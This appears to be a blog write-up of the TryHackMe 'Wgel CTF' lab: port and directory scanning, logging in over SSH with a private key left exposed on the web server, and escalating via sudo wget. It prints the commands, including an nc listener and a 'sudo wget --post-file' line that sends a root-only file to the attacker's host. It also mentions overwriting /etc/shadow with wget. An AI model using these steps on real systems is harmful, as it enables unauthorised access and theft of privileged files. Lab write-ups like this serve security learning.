Home Wgel CTF
Post
Cancel

Wgel CTF

Posted Aug 22, 2022
By Hernán Castillo
2 min read

User Flag

Let’s start with a Nmap scan

1

nmap -p- -sS --min-rate 10000 --open -vvv -n -Pn 10.10.148.177

1
2
3

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 60
80/tcp open  http    syn-ack ttl 60

the webpage is an Apache default page after installation, so let’s scan for directories with gobuster

1

gobuster dir -u http://10.10.148.177/ -w /usr/share/dirb/wordlists/common.txt

meanwhile, I was checking the source code and looks like they’ve patched a vulnerability CVE-2016-4979, and we may have a potential username

1

 <!-- Jessie don't forget to udate the webiste -->

Gobuster scan ended:

1

/sitemap              (Status: 301) [Size: 316] [--> http://10.10.148.177/sitemap/]

and looks like this is the real site, so let’s scan for directories again.

1

gobuster dir -u http://10.10.148.177/sitemap -w /usr/share/dirb/wordlists/common.txt

1
2
3
4
5
6

/.ssh                 (Status: 301) [Size: 321] [--> http://10.10.148.177/sitemap/.ssh/]
/css                  (Status: 301) [Size: 320] [--> http://10.10.148.177/sitemap/css/]
/fonts                (Status: 301) [Size: 322] [--> http://10.10.148.177/sitemap/fonts/]
/images               (Status: 301) [Size: 323] [--> http://10.10.148.177/sitemap/images/]
/index.html           (Status: 200) [Size: 21080]
/js                   (Status: 301) [Size: 319] [--> http://10.10.148.177/sitemap/js/]

.ssh directory looks super strange, if we navigate into it, its the whole rsa private key!, so I copied it over to my pc and try to crack the passphrase with john, but it didn’t have one, so I tried to connect to the ssh service trying jessie username. (other directories doesn’t seem to have anything useful)

1

ssh -i hashb4john jessie@10.10.148.177

and it worked!

if we go through the users folders we will find the user flag

Root Flag

Let’s start with sudo -l to list what things we can run as sudo (if any). And we have one wget, the first thing I do is head over to gtfobins and see if we have a way to escalate privileges, but no one worked for me, so i googled a way to escalate privileges with wget sudo permissions and found this guide which use wget to display the /etc/shadow file, then overwrite it with its own password, but I could get wget to list me the shadow file. So I took the easy way and tried to display the content of the root flag, by logic I had the format of the flag if it was the same as the user flag it’ll be root_flag.txt and it would be on the root directory.

You need to set up a listener on your machine first on port 80

1

nc -lvnp 80

and then on the remote machine

1

sudo /usr/bin/wget --post-file=/root/root_flag.txt [your IP]

and this will give us the root flag

THM, easy machines
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Trending Tags
bruteforce hash kaliapp suid
Contents
Trending Tags
bruteforce hash kaliapp suid